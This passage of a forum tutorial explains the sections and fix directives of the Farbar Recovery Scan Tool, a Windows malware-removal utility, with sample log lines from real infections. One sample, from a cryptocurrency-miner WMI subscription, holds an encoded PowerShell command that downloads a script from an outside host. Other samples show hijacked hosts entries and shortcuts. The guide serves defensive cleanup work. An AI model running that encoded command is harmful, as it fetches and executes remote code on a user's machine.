FRST verifies a number of important system files. Files without a correct digital signature or missing files will be reported. The section is whitelisted outside Recovery Environment when there are no issues with the files.

Modified system files alert you to possible malware infection. Where infection is identified care needs to be taken with remedial action. Expert help should be sought as removal of a system file could render a machine unbootable.

Example taken from a Hijacker.DNS.Hosts infection:

C:\WINDOWS\system32\dnsapi.dll
[2015-07-10 13:00] - [2015-07-10 13:00] - 0680256 _____ (Microsoft Corporation) 5BB42439197E4B3585EF0C4CC7411E4E

C:\WINDOWS\SysWOW64\dnsapi.dll
[2015-07-10 13:00] - [2015-07-10 13:00] - 0534064 _____ (Microsoft Corporation) 4F1AB9478DA2E252F36970BD4E2C643E


In that case the file needs to be replaced with a good copy. Use the Replace: command.


Some versions of a SmartService infection disable the Recovery Mode. FRST automatically reverts the BCD modification during a scan:
 

BCD (recoveryenabled=No -> recoveryenabled=Yes) <==== restored successfully

 
 
The safest way to boot to Safe Mode is to use F8 (Windows 7 and older) or Advanced startup (Windows 11, Windows 10 and Windows 8). In some cases the users use "System Configuration Utility" to boot to Safe Mode. In case the Safe Mode is corrupted the computer gets locked and the system will not boot to normal mode because it is configured to boot to Safe Mode. In that case you will see:
 

safeboot: Minimal ==> The system is configured to boot to Safe Mode <===== ATTENTION


To fix the issue include the above line in the fixlist. FRST will set the normal mode as the default mode and the system will come out of the loop.

Note: This applies to Vista and later Windows versions.

Edited by picasso, 29 January 2023 - 06:33 PM.

Microsoft MVP - Consumer Security 2014, 2015 | MVP Reconnect from 2017

#8 picasso

picasso
  • Topic Starter

  •  Avatar image
  • Security Colleague
  • 2,151 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Poland / The Netherlands
  • Local time:06:29 AM

Posted 29 January 2023 - 05:33 PM

Association

Note: The "Association" will appear on the FRST.txt log when FRST is run from the Recovery Environment. When FRST is run outside Recovery Environment the section will appear on the Addition.txt. The scan in the Recovery Environment is limited to .exe file association.

Lists machine-wide .exe file association like this:



HKLM\...\exefile\open\command: C:\Windows\svchost.com "%1" %* <===== ATTENTION


As with other registry entries you can just copy and paste the entries with the issue in the fixlist and they will be restored. No need to do registry fixes.


Restore Points

Note: The "Restore Points" will appear on the FRST.txt log when FRST is run from the Recovery Environment. When FRST is run outside Recovery Environment the section will appear on the Addition.txt.

The restore points are listed.

Note: Only in Windows XP can the hives be restored using FRST. The restore points listed on Vista and above should be restored from RE (Recovery Environment) using Windows System Recovery Options.

To fix include the line for the one you want to restore into the fixlist script.

Example from an XP machine:
 

RP: -> 2010-10-26 19:51 - 024576 _restore{3216E3D3-FBC5-40AC-B583-63C1B9EE2B6F}\RP83
RP: -> 2010-10-24 13:57 - 024576 _restore{3216E3D3-FBC5-40AC-B583-63C1B9EE2B6F}\RP82
RP: -> 2010-10-21 20:02 - 024576 _restore{3216E3D3-FBC5-40AC-B583-63C1B9EE2B6F}\RP81


To restore the hives from the Restore Points 82 (dated 2010-10-24) the line will be copied and pasted to the fixlist like so:
 

RP: -> 2010-10-24 13:57 - 024576 _restore{3216E3D3-FBC5-40AC-B583-63C1B9EE2B6F}\RP82

 


Memory info

Note: The "Memory info" will appear on the FRST.txt log when FRST is run from the Recovery Environment. When FRST is run outside Recovery Environment the section will appear on the Addition.txt, and will contain more information (BIOS, Motherboard, Processor).

Tells you the amount of RAM (Random Access Memory) installed on the machine together with the available physical memory and percentage of free memory. Sometimes this can help explain a machine's symptoms. For example the number shown may not reflect the hardware position the user believes is present. RAM reported may appear lower than what is actually on the machine. This can happen when the machine cannot actually access all the RAM it has. Possibilities include faulty RAM or Motherboard slot problem or something preventing the BIOS recognising it (e.g. BIOS may need to be upgraded). Also, for 32 bit systems with more than 4GB of ram installed, the maximum amount reported will only be 4GB. This is a limitation on 32-bit applications.

Virtual memory and virtual memory available are also listed.


Drives and MBR & Partition Table

Note: The "Drives" and "MBR & Partition Table" will appear on the FRST.txt log when FRST is run from the Recovery Environment. When FRST is run outside Recovery Environment the sections will appear on the Addition.txt.

Enumerates fixed and removable drives attached to the machine at time of the scan. Not mounted volumes are identified by volume GUID paths.



Drive c: (OS) (Fixed) (Total:223.02 GB) (Free:173.59 GB) (Model: Force MP500) NTFS
Drive f: (Flash drive) (Removable) (Total:1.91 GB) (Free:1.88 GB) FAT32
Drive g: (Recovery) (Fixed) (Total:0.44 GB) (Free:0.08 GB) (Model: Force MP500) NTFS
Drive x: (Boot) (Fixed) (Total:0.5 GB) (Free:0.49 GB) NTFS

\\?\Volume{74a80af8-ff89-444b-a7a3-09db3d90fd32}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

 
 
UEFI/GPT-based partitioning scheme: only the basic GPT layout is detected, but a complete list of partitions is not available.
 

Disk: 0 (Protective MBR) (Size: 223.6 GB) (Disk ID: 00000000)

Partition: GPT.

 
 
BIOS/MBR-based partitioning scheme: the MBR code and partitions entries are detected. However logical partitions in extended partitions are not listed.
 

Disk: 0 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: 73FD73FD)
Partition 1: (Active) - (Size=39.1 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=426.7 GB) - (Type=0F Extended)

 
Where there is an indication of something wrong with the MBR an MBR check may be appropriate. To do this an MBR dump needs to be obtained. Run the following fix with FRST in any mode:
 

SaveMbr: drive=0 (or appropriate drive number)

 
By doing this there will be MBRDUMP.txt saved where FRST/FRST64 has been downloaded to.

Note: While an MBR dump can be obtained either in Normal mode or RE some MBR infections are able to forge the MBR while Windows is being loaded. Accordingly it is recommend to do it in RE.
 
 

LastRegBack

FRST looks into the system and lists the last registry backup made by the system. The registry backup contains a backup of all the hives. It is different from the LKGC (Last Known Good Configuration) backup of the ControlSet.

There are a number of reasons why you might want to use this backup as a solution to a problem but a common one is where loss or corruption has occurred.

You might see this in the FRST header:
 

ATTENTION: Could not load system hive.


To fix just include the line in fixlist like this:
 

LastRegBack: >>date<< >>time<<


Example:
 

LastRegBack: 2013-07-02 15:09

Edited by picasso, 03 September 2023 - 02:51 PM.

Microsoft MVP - Consumer Security 2014, 2015 | MVP Reconnect from 2017

#9 picasso

picasso
  • Topic Starter

  •  Avatar image
  • Security Colleague
  • 2,151 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Poland / The Netherlands
  • Local time:06:29 AM

Posted 29 January 2023 - 05:39 PM

Additional scan (Addition.txt)

 
 
Header

The Additional scan header the contains a brief summary of information that is useful.

Here is an example header:
 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 20-10-2017
Ran by User (21-10-2017 14:16:13)
Running from C:\Users\User\Desktop
Windows 10 Pro Version 1709 16299.19 (X64) (2017-10-17 23:06:22)
Boot Mode: Normal

 
First line: tells whether FRST 32-bit or 64-bit variant has been run. The version identifier of FRST is also shown.
Second line: shows what user ran the tool together with the date and time.
Third line: tells you where FRST was run from.
Fourth line: records the version of Windows and the installation date
Fifth line: tells you what mode the scan was run under


Accounts

Lists standard accounts on the system in the following format: local account name (account SID - privileges - Enabled/Disabled) => profile path. Microsoft Accounts names are not shown.

Malicious entries can be included to be removed.

Example:
 

WgaUtilAcc (S-1-5-21-1858304819-142153404-3944803098-1002 - Administrator - Enabled) => removed successfully

 
Note: Only the account itself will be removed. The eventual user folder in the Users directory should be listed separately to be moved.
 

Security Center

You might find that the list contains leftovers of a previously uninstalled security program. In that case the line can be included in the fixlist to be removed.
There are some security programs that prevent removal of the entry if they are not fully uninstalled. In that case instead of a confirmation of removal on the Fixlog you will see:
 

Security Center Entry => The item is protected. Make sure the software is uninstalled and its services is removed.

 

Installed Programs

Lists classic desktop programs and Windows 11/10/8 packages. Progressive Web Apps are shown together under "Chrome apps".
 
Pre-installed clean Microsoft packages are whitelisted. Ad-supported packages from Microsoft and other publishers are labelled with [MS Ad].
 
Example:
 

App Radio -> C:\Program Files\WindowsApps\34628NielsCup.AppRadio_9.1.40.6_x64__kz2v1f325crd8 [2019-06-04] (Niels Cup) [MS Ad]

 
Enabled or disabled entries visible under Startup are labelled with [Startup Task].
 
FRST has a build-in database for flagging a number of adware/PUP desktop programs.

Example:
 

Zip Opener Packages (HKU\S-1-5-21-3240431825-2694390405-104744025-1000\...\Zip Opener Packages) (Version:  - ) <==== ATTENTION

 
It is strongly recommended to uninstall the flagged program before running an automated tool to remove adware programs. The uninstaller of the adware program removes the majority of its entries and reverses the configuration changes.

Desktop programs not visible in "Programs and Features" are listed with a label like this:
 

Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden

 
There are a lot of legitimate programs that are hidden for good reasons. In case of bad programs, entries can be included in the fixlist.
 
Note: This fix only makes the program visible, it doesn't uninstall the program. The program should be uninstalled by the user.


Custom CLSID

Lists custom classes created in user hives, ShellServiceObjectDelayLoad, ShellServiceObjects, ShellExecuteHooks, ShellIconOverlayIdentifiers, ContextMenuHandlers and FolderExtensions.

Example:
 

ContextMenuHandlers1: [SystemHelper] -> {851aab5c-2010-4157-9c5d-a28dfa7b2660} => C:\Windows\ExplorerPlug.dll  [2018-03-03] (Диспетчер источников) [File not signed]

 
To fix malicious entries just add them to the fixlist and FRST will remove keys from the registry. The associated file/folder should be listed separately to be moved.

Note: Legitimate third party software can create a custom CLSID so care should be exercised as legitimate ones should not be removed.
 
 
Codecs
 
When included in the fixlist, modified default entries will be restored and custom entries will be removed from the registry. The associated files should be listed separately to be moved.
 
 
Shortcuts & WMI

Lists hijacked or suspicious shortcuts in the logged in user's path and in the root directories of C:\ProgramData\Microsoft\Windows\Start Menu\Programs and C:\Users\Public\Desktop.

Entries can be included in fixlist for fixing - see Shortcut.txt in Other optional scans below.

Note: A Shortcut.txt scan contains all the shortcuts from all the users but the report in Addition.txt contains only hijacked/suspect shortcuts in the logged in user profile.
 
FRST scans WMI Namespaces for non-standard registrations. Known infections are flagged.
 
Example taken from a Cryptocurrency Miner infection:
 

WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"****youmm4\"",Filter="__EventFilter.Name=\"****youmm3\":: <==== ATTENTION
WMI:subscription\__EventFilter->****youmm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
WMI:subscription\CommandLineEventConsumer->****youmm4::[CommandLineTemplate => cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB (the data entry has 665 more characters).] <==== ATTENTION

 
To remove the malware include the lines in the fixlist.
 
Note: OEM software (eg. Dell) can create custom registrations. Research unknown entries for information about whether the entries are legitimate or not.

 
Loaded Modules

Loaded Modules are white listed based on the valid digital signature. That is, items not passing the signature verification are shown.


Alternate Data Streams

FRST lists ADS like so:
 

==================== Alternate Data Streams (whitelisted) ==========

AlternateDataStreams: C:\Windows\System32\legitfile:malware.exe [134]
AlternateDataStreams: C:\malware:malware.exe [134]

 
The size of the ADS (number of bytes contained) is shown in brackets at the end of the path.

If the ADS is on a legitimate file/folder the fix will be copy and paste the whole line from the log into the fixlist.

Example:
 

AlternateDataStreams: C:\Windows\System32\legitfile:malware.exe [134]

 
If it is on a bad file/folder the fix will be:
 

C:\malware

 
In the first case FRST only removes the ADS from the file/folder.

In the latter case the file/folder will be removed.


Safe Mode

If any of the main keys (SafeBoot, SafeBoot\Minimal and SafeBoot\Network) are missing, it will be reported. In that case it should be repaired manually.
If there is a malware made entry, it could be included in the fixlist for removal.


Association - Refer to Association earlier in the tutorial

Lists .bat, .cmd, .com, .exe, .reg and .scr file associations.
When any default modified entry is included in the fixlist, the default entry will be restored. Any user key, if included in the fixlist, will be deleted.


Internet Explorer
 
The section title contains the version of Internet Explorer on Windows 7 and older.
 
Depending on the object type, FRST will delete items from the registry or restore their default state.
Accompanying files/folders should be entered separately if they need to be moved.


Hosts content - Refer to Hosts earlier in the tutorial

Supplies more details related to the Hosts file: Hosts file properties and first 30 active entries. Inactive entries (commented out) are hidden.

Example:
 

2009-07-14 04:34 - 2016-04-13 15:39 - 00001626 _____ C:\Windows\system32\Drivers\etc\hosts

107.178.255.88 www.google-analytics.com
107.178.255.88 www.statcounter.com
107.178.255.88 statcounter.com
107.178.255.88 ssl.google-analytics.com
107.178.255.88 partner.googleadservices.com
107.178.255.88 google-analytics.com
107.178.248.130 static.doubleclick.net
107.178.247.130 connect.facebook.net


The lines can't be processed individually.
- To reset the standard file, use the Hosts: directive or include the Hosts warning line from main FRST.txt.
- In case of a custom hosts.ics file, include the file path in the fixlist.


Other Areas

There are some items FRST scans that are not covered under other headings. There is no automatic fix at the moment.
 
 
Path - The entry is visible under the following conditions: the default string is missing, an incorrect placement of the default string, no Path value.
 
Example:
 

HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path ->

 
To fix the Path variable, a manual registry fix or Environment Variables editor could be used.
 
Note: The Path corruption can affect operations of cmd: and Powershell: directives using a relative path to console tools.
 
 
Wallpaper - Various crypto-malware variants use the setting to display a ransom screen.

Example:
 

Normal path might look like this:
HKU\S-1-5-21-2507207478-166344414-3466567977-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\User\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg

Bad path and file might look like this:
HKU\S-1-5-21-746137067-261478967-682003330-1003\Control Panel\Desktop\\Wallpaper -> C:\Documents and Settings\User\My Documents\!Decrypt-All-Files-scqwxua.bmp

 
In case of malware entries, the file path can be included in the fix together with any related files found in FRST.txt.

Note: Removing the malware wallpaper file will remove the Desktop background.

The user should set the Desktop background.

In Windows XP:
To set the Desktop background, right-click on any place on the Desktop and select Properties, select Desktop tab, select a picture, click "Apply" and "OK".

In Windows Vista and above:
To set the Desktop background, right-click on any place on the Desktop and select Personalize, select Desktop Background, select one of the pictures and click "Save Changes".
 
 
DNS servers - DNS currently in use. This is useful to detect DNS/Router hijacking.

Example:
 

DNS Servers: 213.46.228.196 - 62.179.104.196

 
Search the address on Whois Lookup for information about whether the server is legitimate or not.
 
Note: The servers list is not read from registry so the system should be connected to internet.

Where FRST is run in Safe Mode or the system is not connect to internet you will get:
 

DNS Servers: "Media is not connected to internet."

 
 
UAC

Enabled (default setting):
 

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

 
Disabled:
 

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)

 
This can be because the user disabled UAC or as a side effect of malware activity. Unless it is clear that there is a malware cause, reference to the user should be made before a fix is attempted.
 
 
SmartScreen (Windows 8+)

 

For desktop applications and files:
 

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Value data)

 
Value data supported by Windows: Block | Warn | Off (Windows 10 Version 1703+) or RequireAdmin | Prompt | Off (older systems).
 
Missing value (default setting on Windows 10 Version 1703+) or empty value will be reported in the following way:
 

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: )

 
 
Telephony Service Providers (TSP)

The default entries and some third-party legit entries are whitelisted. The line is visible only if a custom entry is detected.
 
Example:
 

HKLM\software\microsoft\Windows\CurrentVersion\Telephony\Providers => ProviderFileName3 -> C:\Windows\system32\unknown.tsp (Publisher)

 
Malicious or broken entries require a manual registry fix. Remove the matching ProviderIDx and ProviderFileNamex entries and renumber the remaining entries accordingly.
 
 
BITS

Lists BITS jobs using a notification command line. See: Attacker Use of the Windows Background Intelligent Transfer Service.
 

BITS: {Job ID} - (Job Name) -> [NotifyCmdLine: Command] [files:Remote Path -> Local Path]

 
To remove all BITS jobs use the EmptyTemp: directive.
 
 
Windows Firewall

Example:
 

Windows Firewall is enabled.

 
Whether Windows firewall is enabled or disabled is also reported. When FRST is run in Safe Mode or, where there is something wrong with the system, then there will be no entry about the Firewall.
 
 
Network Binding (Windows 8+)

Lists non-standard components attached to network adapters. Compare the Drivers section to find a matching element.
 
Example:
 

Network Binding:
=============
Ethernet: COMODO Internet Security Firewall Driver -> inspect (enabled) 
Wi-Fi: COMODO Internet Security Firewall Driver -> inspect (enabled)

 

R1 inspect; C:\Windows\system32\DRIVERS\inspect.sys [129208 2019-10-16] (Comodo Security Solutions, Inc. -> COMODO)

 
In case a standard program uninstallation fails to remove the items, the network binding must be removed before processing the driver. Follow the steps described in ESET Knowledgebase.
 
Note: Make sure that the network binding is removed before including the driver in the fixlist. Otherwise removing the driver will break a network connection.
 
 
 
MSCONFIG/TASK MANAGER disabled items

The log is useful where a user has used MSCONFIG or Task Manager to disable malware entries instead of removing them. Or, they have disabled too much and can't get some needed services or applications to run properly.

Example:

MSCONFIG in Windows 7 and older systems:
 

MSCONFIG\Services: Quotenamron => 2
MSCONFIG\startupfolder: C:^Users^User^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^339bc1.lnk => C:\Windows\pss\339bc1.lnk.Startup
MSCONFIG\startupreg: AdAnti => C:\Program Files (x86)\AdAnti\AdAnti.exe /S


They read as follows:

Disabled Services:

MSCONFIG\Services: ServiceName => Original start type

Disabled items in Startup folder:

MSCONFIG\startupfolder: Original Path (replaced "\" with "^" by Windows)  => Path to backup made by Windows.

Disabled Run entries:

MSCONFIG\startupreg: ValueName => Path to the file.

 
TASK MANAGER in Windows 8 and newer systems:
 

HKLM\...\StartupApproved\Run32: => "win_en_77"
HKU\S-1-5-21-2411900937-544243709-2355068264-1001\...\StartupApproved\StartupFolder: => "SmartWeb.lnk"
HKU\S-1-5-21-2411900937-544243709-2355068264-1001\...\StartupApproved\Run: => "svchost0"

 
Note: Windows 8 and newer use msconfig only for services. Startup items are moved to the Task Manager which stores disabled items in different keys. A disabled non-absent item is listed twice: in FRST.txt (Registry section) and in Addition.txt.
 
 
Entries can be included in the fixlist to be removed. FRST will perform the following actions:
- In case of disabled services, it will delete the key created by MSCONFIG and the service itself.
- In case of disabled Run items, it will delete the key/value created by MSCONFIG/Task Manager. The Run entry itself on newer systems will be deleted too.
- In case of items in Startup folders, it will delete the key/value created by MSCONFIG/Task Manager and move the backup of the file made by Windows (on older systems) or the file itself (on newer systems).

Important: Fix an entry from this section only if you are sure it is a malware entry. If you are unsure about the nature of the entry, do not fix the entry to avoid deleting legit items. In case of disabled legit items that should be enabled, a user should be instructed to turn them on via MSCONFIG utility or Task Manager.


FirewallRules

Lists FirewallRules, AuthorizedApplications and GloballyOpenPorts.

Example (Windows 10):
 

FirewallRules: [{E3D59A00-E41A-4AE5-AECF-E7AC117FBF83}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe (Chao Wei -> )
FirewallRules: [{7FEA26C4-3ECE-4431-8FA1-E9AFE7F3B0DD}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation -> Mozilla Corporation)

 
Example (XP):
 

StandardProfile\AuthorizedApplications: [C:\Program Files\Firefox\bin\FirefoxUpdate.exe] => Enabled:Update service
StandardProfile\AuthorizedApplications: [C:\Program Files\Firefox\Firefox.exe] => Enabled:Firefox browser
StandardProfile\GloballyOpenPorts: [2900:TCP] => Enabled:ztdtqhnh


If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.


Restore Points - Refer to Restore Points earlier in the tutorial

Lists available Restore Points in the following format:
 

18-04-2016 14:39:58 Windows Update
18-04-2016 22:04:49 Restore Point Created by FRST


Disabled function will be reported:
 

ATTENTION: System Restore is disabled  (Total:59.04 GB) (Free:43.19 GB) (73%)

 
Note: The entry refers to System Restore disabled in a standard way. System Restore disabled via Group Policy will be reported in FRST.txt (under the Registry section). In both cases System Restore can be automatically enabled. See the CreateRestorePoint: and SystemRestore: directives.
 
 
Faulty Device Manager Devices
 
Example:
 

Name: bsdriver
Description: bsdriver
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: bsdriver
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.

 
 
Event log errors:

 

Application errors
System errors
CodeIntegrity errors

Windows Defender errors and warnings


 
Memory info - Refer to Memory info earlier in the tutorial


Drives


MBR & Partition Table - Refer to Drives and MBR & Partition Table earlier in the tutorial


Edited by picasso, 29 March 2024 - 06:37 AM.

Microsoft MVP - Consumer Security 2014, 2015 | MVP Reconnect from 2017

#10 picasso

picasso
  • Topic Starter

  •  Avatar image
  • Security Colleague
  • 2,151 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Poland / The Netherlands
  • Local time:06:29 AM

Posted 29 January 2023 - 05:45 PM

Other optional scans



Optional Scans

By checking a box under Optional Scan FRST will scan the requested items.


List BCD

Boot Configuration Data is listed.


SigCheckExt

Lists all unsigned .exe and .dll files in standard folders. The output is formatted in the same way as "One Month" list.


Shortcut.txt

Lists all types of shortcuts from all standard accounts. Hijacked entries can be included in the fixlist to be restored or removed.

Example:
 

Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\jIxmRfR\jIxmRfR\chrome.exe (The jIxmRfR Authors)
Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\jIxmRfR\jIxmRfR\chrome.exe (The jIxmRfR Authors)
Shortcut: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\jIxmRfR\jIxmRfR\chrome.exe (The jIxmRfR Authors)

ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> "hxxp://trustedsurf.com/?ssid=1461248741&a=1003478&src=sh&uuid=56568057-03d0-4fdb-a271-15ae6cc4d336"
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%


To fix the ShortcutWithArgument: lines, just copy and paste the lines into the fixlist. But to remove the Shortcut: objects add the paths separately to the fix.

A full script would look like this:
 

ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> "hxxp://trustedsurf.com/?ssid=1461248741&a=1003478&src=sh&uuid=56568057-03d0-4fdb-a271-15ae6cc4d336"
ShortcutWithArgument: C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
C:\Program Files (x86)\jIxmRfR
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Users\Public\Desktop\Google Chrome.lnk
C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk

.
Note: FRST removes the argument from shortcuts except for Internet Explorer (No Add-ons).lnk shortcut. That shortcut argument by default is not empty (the argument is -extoff) and is used to run Internet Explorer without add-ons. It is vital for troubleshooting IE issues so this shortcut argument will be restored.

Also note that if you run another removal tool to remove the argument from Internet Explorer (No Add-ons).lnk, FRST will not list it under ShortcutWithArgument: and so the argument can't be restored with FRST any more. In that case the user can restore the argument manually.


To restore the argument manually the user should navigate to Internet Explorer (No Add-ons).lnk:

Right-click and select Property.
In Target box Add two spaces and then -extoff to the listed path.
Click Apply and OK.


90 Days Files

When the "90 Days Files" option is checked, FRST will list "Three months (Created/Modified)" instead of "One month (Created/Modified)".
 

Search features


Search Files

There is a Search Files button on the FRST Console. To search for files you can type or copy and paste the names you wish to search for into the Search box. Wildcards are allowed. If you need to search for more than one file the file names should be separated by a semicolon ;
 

term;term

.

*term*;*term*

 
When the Search Files button is pressed the user is informed that the search is started, a progress bar appears, then a message pops up indicating that the search is completed. A Search.txt log is saved at the same location that FRST is located.

The found files are listed along with creation date, modification date, size, attribute, company name, MD5 and digital signature in the following format:
 

C:\Windows\WinSxS\amd64_microsoft-windows-dns-client-minwin_31bf3856ad364e35_10.0.15063.608_none_2ad0781c8951a362\dnsapi.dll
[2017-03-18 22:57][2017-03-18 22:57] 000661224 _____ (Microsoft Corporation) 0F9FA6A2D4EAE50393DCE473759A9845 [File is digitally signed]


Search Files option is limited to the system drive. There are cases where a legitimate system file is missing or corrupted causing boot issues and there is no replacement on the system. When Search Files option is used in Recovery Mode (Vista and above) the search includes the files in X: too (the virtual boot drive). In some cases it can be a life saver. An example is missing services.exe that could be copied from X:\Windows\System32 to C:\Windows\System32

Note: The X: drive will only contain 64bit executables for 64bit systems.
 
The "Search Files" button can be used to perform additional searches, see FindFolder: and SearchAll: below. Results will be recorded in the Search.txt log.


Search Registry

There is a Search Registry button on the FRST Console. You can type or copy and paste the item(s) names you wish to search for into the Search box. If you wish to search for more than one item, the names should be separated by a semicolon ;
 

term;term

 
Contrary to a file search, when carrying out a registry search, adding wildcards to the search terms should be avoided because the wildcard characters will be interpreted literally. Where a wildcard ("*" or "?") is added to the start or end of a registry search term, FRST will ignore it and will search for the search term without the character.
 
A SearchReg.txt log is saved at the same location that FRST is located.
 
Note: The Registry search function will only work outside RE.
 
 
 
FindFolder:

To search for folder(s) on the system drive enter the following syntax in the Search box and press the "Search Files" button:
 

FindFolder: term;term

 
Wildcards are supported:
 

FindFolder: *term*;*term*

 

SearchAll:

To perform a full search (files, folders, registry) for one or more terms enter the following syntax in the Search box and press the "Search Files" button:
 

SearchAll: term;term

 
Do not add wildcards to the term(s). FRST automatically interprets the term(s) as *term(s)* in case of files and folders.
 
Note: The full search performed in the Recovery Environment is limited to files and folders.


Edited by picasso, 03 September 2023 - 03:47 PM.

Microsoft MVP - Consumer Security 2014, 2015 | MVP Reconnect from 2017

#11 picasso

picasso
  • Topic Starter

  •  Avatar image
  • Security Colleague
  • 2,151 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Poland / The Netherlands
  • Local time:06:29 AM

Posted 29 January 2023 - 05:52 PM

Directives/Commands


All the commands/directives in FRST should be on one line as FRST processes the script line by line.



Quick reference of Directives/Commands

Note: Directives/Commands are not case sensitive.


For use only in Normal Mode

CreateRestorePoint:
SystemRestore:
TasksDetails:

For use only in Normal Mode, Safe Mode

CloseProcesses:
EmptyEventLogs:
EmptyTemp:
Powershell:
Reboot:
RemoveProxy:
StartPowershell: — EndPowershell:
Virusscan:
Zip:

For use in Normal Mode, Safe Mode and in the Recovery Environment (RE)

cmd:
Comment:
Copy:
CreateDummy:
DeleteJunctionsInDirectory:
DeleteKey: and DeleteValue:
DeleteQuarantine:
DisableService:
ExportKey: and ExportValue:
File:
FilesInDirectory: and Folder:
FindFolder:
Hosts:
ListPermissions:
Move:
Reg:
RemoveDirectory:
Replace:
RestoreQuarantine:
SaveMbr:
SetDefaultFilePermissions:
StartBatch: — EndBatch:
StartRegedit: — EndRegedit:

Symlink:
testsigning on:
Unlock:


For use only in the Recovery Environment (RE)

LastRegBack:
RestoreFromBackup:
RestoreMbr:





Examples of use


CloseProcesses:

Closes all the non-essential processes. Helps to make fixing more effective and faster.

When this directive is included in a fix it will automatically apply a reboot. There is no need to use the Reboot: directive. The CloseProcesses: directive is not needed and not available in the Recovery Environment.


CMD:

Occasionally you need to run CMD command. In that case you must use "CMD:" directive.

The script will be:
 

CMD: command


If there is more than one command, start each line with CMD: to get an output log for each command.

Example:
 

CMD: copy /y c:\windows\minidump\*.dmp e:\
CMD: bootrec /FixMbr

 
The first command will copy the minidump files to flash drive ( if the drive letter for flash drive is E).
The second command is used to fix the MBR in Windows Vista and higher.
 
Alternatively, the StartBatch:EndBatch: directives could be used (see below).

Note: Unlike the native or other FRST directives the cmd commands should have the proper cmd.exe syntax, like use of " quotes in case of a space in the file/directory path.
 
 
Comment:
 
Adds a note to provide feedback on the Fixlist content.

Example:
 

Comment: The following command will remove all network proxies from the system
RemoveProxy:

 
 
Copy:

To copy files or folders in a style similar to xcopy.
 
The syntax is:
 

Copy: source file/folder destination folder

 
The destination folder will be automatically created (if not present).
 
Example:
 

Copy: C:\Users\User\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\spartan.edb C:\Users\User\Desktop\Edge Backup
Copy: C:\Windows\Minidump F:\

 
Note: For replacing single files, it is recommended to use the Replace: directive. In case of an existing target file Copy: only tries to overwrite the file, while Replace: additionally tries to unlock and move the file to Quarantine.
